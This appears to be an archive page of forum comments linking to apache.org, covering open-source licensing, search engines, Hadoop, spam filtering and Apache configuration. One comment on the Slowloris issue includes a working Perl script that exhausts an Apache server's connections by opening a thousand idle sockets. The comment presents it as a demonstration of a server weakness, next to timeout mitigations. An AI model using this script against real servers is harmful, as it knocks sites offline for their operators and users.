Domain: apache.org
Stories and comments across the archive that link to apache.org.
Comments · 2,937
-
Re:Apache v2.0
You absolutely can use that in commercial products. You can also create derivative works and not release the source.
Apache 2.0 is considered a "commerce friendly" open source license (whatever that means). You'll see it in commercial products like Android and the Apache web server.
-
Re:don't hate PDF 'cause it's beautiful
It's easy to generate beautiful PDFs from well-structured data but it's much harder to go the other way. Would you rather have budget figures (for example) as a CSV file in a well-defined format or as a PDF of tables and graphs?
More importantly, it's then easy to import that data for visualization and analysis purposes. Data presented as a PDF file is effectively so inaccessible that it will rarely be extracted for further analysis, meaning that some gov't functionary becomes responsible for the presentation and analysis instead of members of the public. Then a panoply of tools become available for finding out things from that data that no one ever knew were there. Something like Tableau Desktop can slurp in CSV data (or data imported to a slew of OSS or commercial DBs) and allow very rapid exploration.
As an aside, I will point out that CSV is an _evil_ format. Did you know it can be generated in localized forms (without any distinguishing metadata), that mean comma is supplanted for use as a thousands separator? Oops. Really, what idiot thought it was a good idea to have a localized data format... Much better to use a serialization format like Avro which uses a compact serialization for tabular data (akin to Protocol Buffers or Thrift) and the schema data (i.e. the description of the table's structure: columns, types, etc.) as a sidecar file in JSON.
-
Re:What are the odds?
Well, not exactly true, since SA support all sorts of plug-ins that can catch this type o spam, as well as generic spam, such as Cloudmark plugins and various blackhole lists.
The test list http://spamassassin.apache.org/tests_3_2_x.html shows many that might be useful for this.
-
Re:IBM OmniFind
nothing but a packaged version of Apache Lucene.
Ahh... no... OmniFind Enterprise Edition (the version you pay for) is NOT based on Lucene. So, maybe you should keep your mouth shut if you don't know what you are talking about.
To the OP, if you want an enterprise class secure search engine that will search across
- filesystems
- websites
- nntp server
- Content repositories like FileNet, Documentum, Stellant, Quickr, Sharepoint
- Portal servers
- UIMA plugins
- Messaging servers (Exchange & Domino/Notes)
- and APIs for you to crawl any third party system (SAP, Siebel, anything etc)
then OmniFind Enterprise Edition is the way to go.And IBM has a half price starter edition for smaller implementations.
-
version control system + build/deploy engine
We do this for many many Drupal sites on many horizontal web nodes via bzr + ant. By 'sites' I mean no multi-site; each 'site' gets its own Drupal instance. By 'Drupal instance', I mean the 'Drupal instance' is an ant-powered deploy from a branch in bzr comprised of vendor branches (core + modules) merged in plus customizations by our shop. Each environment gets a branch, and we merge code upstream (dev -> tst -> prd).
The only thing 'shared' across the infrastructure is the web services and frameworks on the webapp nodes. Ant is great at auto-magic MySQL db provisioning, Drush calls to pound the schema, APC cache flushes, Memcached bops, etc. Also I would throw myself off a bridge if I had to manage all the complex merges across our branches and dealing with updating the vendor branches.
Others here also made the comment wrt code up, content down. Live it, love it; SERIOUSLY! Refresh often, and give your devs anonymized slices of the db for them to keep on a laptop they will undoubtedly leave in a cab. Were currently bending ant to perform the downstream refreshes + sanitizes. Looks very promising.
Also if youre not able to bastardize ant to do what you want it to do, look at ant-contrib to further extend the tool.
http://bazaar-vcs.org/en/
http://ant.apache.org/
http://ant-contrib.sourceforge.net/Slightly OT: The J2EE guys at $employer prefer a maven+ant+svn approach. YMMV.
Have fun. These are very interesting toys to play with, tbh.
-
IBM OmniFind
If you're able to get a hold of it, IBM OmniFind Yahoo Edition would do the trick. Unfortunately Yahoo pulled the plug when they went into bed with Microsoft (Bing). I'm using it on a local intranet, and it works great. If you have a deep wallet, you can always look into the commercial version IBM offers, but it is really nothing but a packaged version of Apache Lucene.
-
Re:NO! Try Alfresco
You could use Microsoft Enterprise Search Server Express which is free (if you have a Windows Server license laying around). It's the same search engine as MOSS without the CMS functionality and it can crawl just about everything either natively or with connectors. You can use MSSQL Express as the database engine which is also free.
Or you could go completely open source with Apache SOLR, though I hear it's so featureful that it's very difficult to install and configure.
-
Lucene is a great foundation for this
So I think I'd start by looking here.
-
Enterprise Content Management with Alfresco
Yes, Google's Search Appliance (GSA) could be used, I have seen it used with limited success. The main problem was how to respect access control on documents: either you index them or you don't, and if you index them with GSA, sensitive data may show up in search results. Also, we had a lot of trouble "taming" GSA: it would regularly take down servers that were dimensioned for light loads.
I would suggest using Alfresco http://www.alfresco.com/ as a CIFS (Common Internet File System) or WebDav store for all those documents. This would give you the simplicity of a shared folder and the opportunity to enrich the documents with searchable metadata such as tags, etc. Each folder (or any item, in fact) could have the correct access control that would be respected by the search engine, Lucene. http://lucene.apache.org/java/docs/
Alfresco comes in both Enterprise and Community Edition, it's very easy to try out -- even our non-techie project manager could install it on his PC within 10 minutes. Try that with Documentum, FileNet or IBM DB2 Content Manager!
-
Re:The web server can finally serve large files
When I looked at the release notes sent out by email, I saw this under "New functionality":
"httpd(8) can now serve files larger than 2GB in size."
I'm very surprised by this.apache has been able to do that since 2.2. Of course, a web page larger than 2 gigs is a bug not a feature...
http://httpd.apache.org/docs/2.2/new_features_2_2.html
Large File Support
httpd is now built with support for files larger than 2GB on modern 32-bit Unix systems. Support for handling >2GB request bodies has also been added. -
Re:Cause and Effect
Maybe the way it was written is why FOSS is where it's at? Might not be such a bad idea to keep it around?
Then again, maybe the GPL is not responsible for great free software and open source software being written.
Don't get me wrong, I think developers should be allowed to pick their license of choice, including GPL. But there are plenty of examples of free software and open source software being highly successful and widely used that are not GPL'd.
The assumption that the GPL is responsible for the success of FOSS reminds me of a Simpsons episode where Homer is carrying a rock around that supposedly repels lions (or something). Lisa says, "That's ridiculous! What makes you think that repels lions?" and Homer replies, "You don't see any lions around, do you?"
I believe that the publicity surrounding GPL and the way it forces developers who use code licensed under it was a major factor in the expansion and acceptance of open source software. That doesn't mean that those other licenses aren't just as valuable to the ongoing health of and expansion of open source software. It just means that GPL created the mindspace to allow non-geeks to view open source as something more than a fringe element.
-
Re:Cause and Effect
Maybe the way it was written is why FOSS is where it's at? Might not be such a bad idea to keep it around?
Then again, maybe the GPL is not responsible for great free software and open source software being written.
Don't get me wrong, I think developers should be allowed to pick their license of choice, including GPL. But there are plenty of examples of free software and open source software being highly successful and widely used that are not GPL'd.
The assumption that the GPL is responsible for the success of FOSS reminds me of a Simpsons episode where Homer is carrying a rock around that supposedly repels lions (or something). Lisa says, "That's ridiculous! What makes you think that repels lions?" and Homer replies, "You don't see any lions around, do you?"
-
Re:Data management problem
I'm bad at explaining stuff like this, so: http://wiki.apache.org/hadoop/Hbase/FAQ#A20
-
two great portable runtime libraries
-
Re:Apache Portable Runtime
-
many choices
-
Re:This article oversimplifies a complex problem
Is the open source solution close enough to the needs of the Ontario government that, as the article alleges, all you need to do is buy some servers and set it up and there are negligible other costs? I seriously doubt it. I would be willing to bet heavily against it. Anyone who thinks otherwise probably hasn't spent much time developing software for government.
I haven't, no...but what are said needs?
I'm assuming that the main component of a record system is going to be a database. You'll also need a usable system and interface for entering and retrieving said records into the DB. You're also going to want to do SQL dumps and periodic offsite backups, so that if anything goes wrong, you can get the data back.
Of course, it will also be very important to ensure that the operating system the database is hosted on, is as robust as possible, to minimise the possibility of crashes; as well as a strong filesystem for times when you need to make a lot of queries at once. Even though that system is meant for servers, you can still make it user friendly for your administrative staff as well, if you need to.
If you're going to want the records accessible from outside the hospital, you'll probably also want to make sure that they are protected by a couple of very secure firewalls, as well, since it could potentially mean the loss of someone's life if they get cracked.
Finally, they will need to make sure that whoever puts the network together does so according to sound administration principles, as well.
-
So who cares about the CLR/Mono anyways?
So I'm going to trot out a different perspective; enough others will thrash through the personalities under discussion here. In my view, Mono is essentially irrelevant. Some folks will use it to bridge apps around platforms, instead of Qt or a handful of other approaches. Yawn. Internally, Microsoft has done some pretty neat things with their various implementations of the CLR (the VM underlying C#). This is unsurprising, as they're well capable of hiring some pretty bright folks. But I doubt that any of that will ever really inform the broader computing community.
In contrast, the JVM seems to be undergoing a renaissance. There's tons of programming language work on the JVM these days: Scala, JRuby, Clojure, Jython, etc. Each of these are bringing their own communities and problem domains to the JVM, and have already broken new ground in language implementation and design. As for new frameworks, there's scalable computing work going on under the Hadoop project (Google filesystem, Bigtable, and map-reduce for-the-rest-of-us) and the really interesting related framework Cascading. With the JVM as an interoperability platform, these languages and various new frameworks all get to be combined together in fascinating new ways.
-
Re:Until they hit the jackpot
-
sharepoint is another failureSlashdot is just doing its part to publish astroturfing. MS Sharepoint is a failure wherever it is deployed. Here are the CRM packages MS is trying out shout:
-
Re:Any verification on the Apache web server?
-
CouchDB
Check out CouchDB. It is built around the concepts of distributed (and even offline) databases and handles conflict resolution. It employs optimistic locking.
-
Re:So it looks like these are for "cloud computing
If you want to be buzz-word compliant, then yes, kind of.
More to the point, GFS and HDFS are distributed file-systems that are designed to run on potentially very large clusters of commodity hardware. The potential applications are quite diverse. Hadoop itself involves more than just the file-system, but HDFS is really at the core of any application you would want to build with it. This list gives you a good idea of who uses Hadoop and for what purpose.
-
Why use a language-dependent MOM?
I'm bewildered why "plain old Java objects" is considered a virtue, considering it still makes the middleware language-specific for something that is essentially an integration software. If all you do is Java, fine. But gambling that you'll always be married to one language seems like you're giving up too much for no gain. Perhaps developers should take a closer look at something like Advanced Message Queuing Protocol (AMQP) and implementations like RabbitMQ or Apache ActiveMQ?
-
Other approaches to scalable SQL
There are also two Hadoop subprojects that either support SQL or will shortly. They both translate SQL queries into map/reduce programs. They are:
-
Other approaches to scalable SQL
There are also two Hadoop subprojects that either support SQL or will shortly. They both translate SQL queries into map/reduce programs. They are:
-
Perhaps the contractors could...
... find a way to contribute some small portion of their profits to The Apache Software Foundation?
Or any number of PHP- and Linux-related organizations?
Or Drupal?
That just seems to be the right thing to do, is all.
-
This is a Good Thing
The site is running Apache on Red Hat Enterprise Linux 5, and it looks like Drupal running on PHP. What more do you want?
-
Re:Remote X servers?
-
Just show up and start helping out
You don't need to ask anyone permission, just show up and start helping out. If you check out the source code to the Apache HTTP Server (find out how at http://httpd.apache.org/dev/devnotes.html), you'll find 50 instances of the word "FIXME" in the source code (case insensitive search). Check out what the original author thought still needs fixing, and post a patch to dev@httpd.apache.org. Alternatively, you can look in the bug database and start picking low hanging fruit. Again, no permission needed. If your patches are good, they'll get committed. If they aren't, we'll tell you how you can improve.
You will find that every project has its own coding conventions, macros, libraries and idiosynchrasies. Real code will look very different from the examples and exercises you have worked with so far. You'll have to learn the particulars and become comfortable with each project you take on. This is a tedious and uncomfortable process, but it does tend to pay off.
-
Just show up and start helping out
You don't need to ask anyone permission, just show up and start helping out. If you check out the source code to the Apache HTTP Server (find out how at http://httpd.apache.org/dev/devnotes.html), you'll find 50 instances of the word "FIXME" in the source code (case insensitive search). Check out what the original author thought still needs fixing, and post a patch to dev@httpd.apache.org. Alternatively, you can look in the bug database and start picking low hanging fruit. Again, no permission needed. If your patches are good, they'll get committed. If they aren't, we'll tell you how you can improve.
You will find that every project has its own coding conventions, macros, libraries and idiosynchrasies. Real code will look very different from the examples and exercises you have worked with so far. You'll have to learn the particulars and become comfortable with each project you take on. This is a tedious and uncomfortable process, but it does tend to pay off.
-
Just show up and start helping out
You don't need to ask anyone permission, just show up and start helping out. If you check out the source code to the Apache HTTP Server (find out how at http://httpd.apache.org/dev/devnotes.html), you'll find 50 instances of the word "FIXME" in the source code (case insensitive search). Check out what the original author thought still needs fixing, and post a patch to dev@httpd.apache.org. Alternatively, you can look in the bug database and start picking low hanging fruit. Again, no permission needed. If your patches are good, they'll get committed. If they aren't, we'll tell you how you can improve.
You will find that every project has its own coding conventions, macros, libraries and idiosynchrasies. Real code will look very different from the examples and exercises you have worked with so far. You'll have to learn the particulars and become comfortable with each project you take on. This is a tedious and uncomfortable process, but it does tend to pay off.
-
Re:Argument moot, just use both
That's an excellent client-side solution.
In the interest of asking, though, what about a server-side solution? One could use HTTP Accept headers and content negotiation in the HTTP server, if you'll excuse the slight dip in performance. For example:
- Browser requests
/path/to/video. - The browser sends the Accept header (or X-HTML5-Video-Accept header, if you want it that way), which contains video/mp4;q=0.9; video/ogg;q=0.8.
- The server sends
/path/to/video.mp4.
Likewise:
- Browser requests
/path/to/video. - The browser sends the Accept header (or X-HTML5-Video-Accept header, if you want it that way), which contains video/ogg,*;q=0.1.
- The server sends
/path/to/video.ogg.
Something like that, at least. In fact, were browsers to add video MIME types to their Accept headers, one could implement this yesterday. This solves the issue of codecs, as long as content providers make it available in as many formats as possible.
- Browser requests
-
Re:k
Really? Am I the only person that found it interesting that Lucene, the only non C/C++ implementation, gave some pretty impressive stats? I mean, it's written in Java and although it has a slower index time its search time, index size and relevancy are impressive.
Lucene is a great search tool. As TFA pointed out, however, if you're looking for a "search solution" rather than "search engine" then you should check out Solr instead. Lucene is a toolkit that you build on top of, not something you really want to deploy by itself. Solr is that thing built on top of Lucene.
Be aware that while Lucene/Solr has made terrific progress, it is not quite in the "enterprise search" category. For superscale implementations you'll still likely need to look at a high-priced product like FAST. -
You are reinventing DocBook
You are trying to reinvent docbook. Not only is everything you want done, it is implemented in several tools (XMLMind and oXygen are two I know of), has a standard method of converting it to any form you want (XSL, XSLT, XSL-FO), and there are tools that are already written to take advantage of those standards (Apache FOP being a FLOSS one). The latest version of DocBook uses XML namespaces, so you can mix in other markup languages as well; the canonical example is DocBook + MathML + SVG, which covers 99.9% of the math/science based literature out there. BTW, if you DO plan on going down this path, I suggest picking up a copy of XSLT, 2nd edition by Doug Tidwell. The latest version of the DocBook book is supposed to be out in August; don't buy the version currently on sale, it is 10 years old, and does NOT cover the current version of DocBook.
-
XML/XSL/FOP/PDF
-
Re:(of course, I may have mis-read you)
I'm hardly an idiot. If I could find an open source software package capable of doing what I require, I would have gone that way a long time ago. As it stands, I have to use a proprietary software package that does not allow me to weight the incoming emails based of *any* RBL's. I can only refuse the connection based on the RBL's.
You're kidding right? What (where) is your skill set? Build a Linux or FreeBSD smart host box with Postfix and SpamAssassin. Then relay the scrubbed mail stream to your current mail server. You can block outright based on dnsbl hits within Postfix, or you can score based on dnsbl hits in SpamAssassin.
Here's a decent head start:
http://www.debian.org/
http://wiki.debian.org/Postfix
http://www.debianhelp.co.uk/spam.htm
http://wiki.apache.org/spamassassin/DnsBlocklistsIf you're currently running Exchange, all you have to do is tell Postfix to relay all inbound mail to the IP address of your Exch server. For example, in main.cf you'd have:
relayhost = 10.3.2.1
To get Postfix to accept mail for your users, you can either have Postfix poll your AD server for valid user addresses, or you can just manually type them into a relay_recipients file, if you're a small organization, say 100 users or less. The manual thing gets really tedious for larger user counts.
It's a fantastic anti spam solution. If you're not a sysadmin type and don't know anything about dns and changing MX IPs in your dns server or getting your provider to do it, you may not want to take this plunge. You've got to have some decent networking background, including configuring dns entries on your authoritative server.
-
Re:Why Do They Ignore Their Own Advice?
What you really need is a system to 'compile' the source pages to something less readable, but significantly smaller - removing comments, replacing the unneeded end tags, shortening the variable names. If that was automated...
Something like gzip compression perhaps?
-
Re:*snort*
>I would love to find a proprietary product out there that uses the RBL's like that and also provides the features I am looking for.
http://spamassassin.apache.org/
Why does the solution have to be proprietary? SA works great. Out of thousands of spams that come into my account per day, maybe only 1 or 2 make it through, and there's no almost no false positives lately.
-
Re:Dropbox
If you could explain how to setup you described, I am sure I am not the only one who would be interested.
- Install your favorite Linux distribution on spare hardware.
- Install the Apache HTTP server from the distribution, and start the service.
- Test Apache from another computer on your LAN.
- Configure your firewall to forward a port to port 80 on the Linux machine.
- Copy files to the Linux directory served by Apache.
- Profit!!
Seriously, though, at this point, you need to add some sort of security, and would probably want to set up virtual directories so that you don't have to place all the files under
/var/www/html (the default location served by Apache). The default Apache config file (/etc/httpd/conf/httpd.conf) is heavily commented so as to be self-documenting for most tasks, although using SSL is not one of them. But, for the heavy lifting, the Apache docs will cover everything. You'll also almost certainly want to set up some sort of dynamic DNS as the poster above describes.I'm sure most people here will call me nasty names because of it, but I also use IIS to serve some of my sites.
-
Re:Not a flaw, easily configured around
Th work-around works fine.
I downloaded the Slowloris and was able to take down a default apache install, however with keepalive disabled and a timeout of 5, the attack became inneffective.
This may be a problem for sites with users that do long-running POSTs, but since we don't have any of those, all I can say is "It works here . . . "
For more info: http://httpd.apache.org/docs/trunk/misc/security_tips.html -
HTTP hints at a solution
HTTP 1.1 specifies a status code for "Request Timeout" (408) and "Gateway Timeout" (504).
What is needed, therefore, is a timer running for receiving the complete header, and a second one for accepting the body. The timer for the body can be controlled by the type of request and the Content-Length header. (With, of course, a specific cap.)
Currently, Apache 2.2 has a single timeout value for all types of requests, but it is interpreted differently for the different types.
If your server only handles GETs, the obvious thing is to crank that number down. Unfortunately, for PUTs, the TimeOut value affects inter-packet time in the request, not overall request time.
Strangely, the timeout doesn't seem to run in 2.2.10 and 2.2.11 before data is received. Oh dear. That's an even simpler DoS.
#!/usr/bin/env perl
use IO::Socket::INET;
use strict;
use constant DEFAULT_PORT => "http";
MAIN: {
if(@ARGV<1 or @ARGV>2) {
die "Usage: $0 host [port]\n";
}
my($host)=shift;
my($port)=@ARGV?shift:DEFAULT_PORT;
my(@sockets);
for(my $cnt=0;$cnt<1000;++$cnt) {
my $socket=new IO::Socket::INET(PeerAddr=>$host,
PeerPort=>$port,
Proto=>"tcp");
unless(defined($socket)) {
die "Cannot create socket to $host:$port--$!\n";
}
$socket->print("\r\n");
push(@sockets,$socket);
print " Have ".@sockets." open.\n";
}
}Not quite as stealthy, though. At least as above.
-
The power behind CouchDB
I notice that CouchDB makes a big deal of its Erlang based core -- essentially "this part is trustworthy and parallelises well because it's in Erlang".
I also notice Joe Armstrong (or more likely a transcriber) is as bad at spelling "lose" as the rest of the internet...
-
Re:Document management software
The problem with document management software is that they require users to do some "extra" work filling in metadata. This fails. Generally users will not fill in more than title, adding keywords, short descriptions, file numbers are simply too much effort. When the metadata fails, the document management system also fails.
I suggest you first look at geting a good enterprise search engine. Lucene(apache.org) is open source and free, MindServer (www.recommind.com) from Recommind is not but is amazing (I'm a happy client, not a shill).
If your users can find everything they need to do their work, who cares how badly it is sorted or filed.
-
Re:Even a stopped clock can tell the right time
You seem to imply that Android is closed source? It's not.
The hardest part of the search technology, the processing of massive amounts of data and the indexing of that was open sourced as well.
I think it's fair to say that Microsoft is anti-open source and Google pro-open source. Actions speak louder than words, especially words coming from Microsoft I might add.
-
Re:FreeIPA, Apple OD, Gosa2, Novell eDirectory, FD
There is also:
Apache Directory
Sun OpenDS -
Re:all-your-code-is-ours
I agree with your opinion about not signing an agreement like this, but I believe the blog post is referring to something slightly different. Many open source projects require contributors to sign an agreement that basically say that the code you are contributing does not have existing copyright restrictions. This is a little different than the employer/employee contracts that says all your code/work/ideas/children created during employment belong to the company. The contributor license at apache for example, I think is more aimed at preventing them from being sued in case someone uploads all their company's proprietary code to an open source project.
-
Re:We need to take care of our privacy.
NoScript is completely ineffectual against even passably mediocre tracking technologies. I mean, I can think of at least a couple of ways to bypass NoScript without breaking a mental sweat.
Let's see...
Request comes to web server. Web server gets IP address, referrer (or referer if you're the W3C). That immediately goes into a database, along with a unique GUID that then gets appended as a variable to every link on my page. This can either be done GET-style as a URL parameter...
http://slashdot.org/~Civil_Disobedient/?12345
...or, I can just put it as part of the actual link, like this:http://slashdot.org/12345/~Civil_Disobedient/
...and then mod_rewrite it to the first form. Or I could do this just as easily:http://slashdot.org/12345~Civil_Disobedient/
There's really nothing that can be done to stop it, but this shouldn't make you any more paranoid than saying there's nothing you can do to stop store owners from memorizing faces and purchases.
-
COBOL
New alternatives are popping up constantly but I'm going to go out on a limb and say that SQL is going to be around for a long time.
That's pretty much guaranteed. COBOL is still around.
There absolutely are better alternatives, for almost every situation. No one in their right mind starts a new system in COBOL, when they have a choice.
Yet COBOL is still around, and will be still around for awhile. So will SQL.
The only question is whether SQL will be like COBOL or like C. I could make a similar case for C being obsolete, and there are certainly many cases where a performance penalty is well worth it to get some other desired feature -- for instance, there are things I can imagine doing in Erlang that I'd never attempt in C. But people do anyway, and even modern high level languages seem to start as interpreters written in C.
Personally, I'd rather see CouchDB mature, and see SQL become more like COBOL, but that doesn't seem likely to happen soon.
-
Re:"The non-open and proprietary..." blah blah
We're using Batik and it's great. It's real, working, (mostly) complete, and multi-platform. Does it cover absolutely everything? No, it doesn't (see their status page), but it has done everything that we want it to do.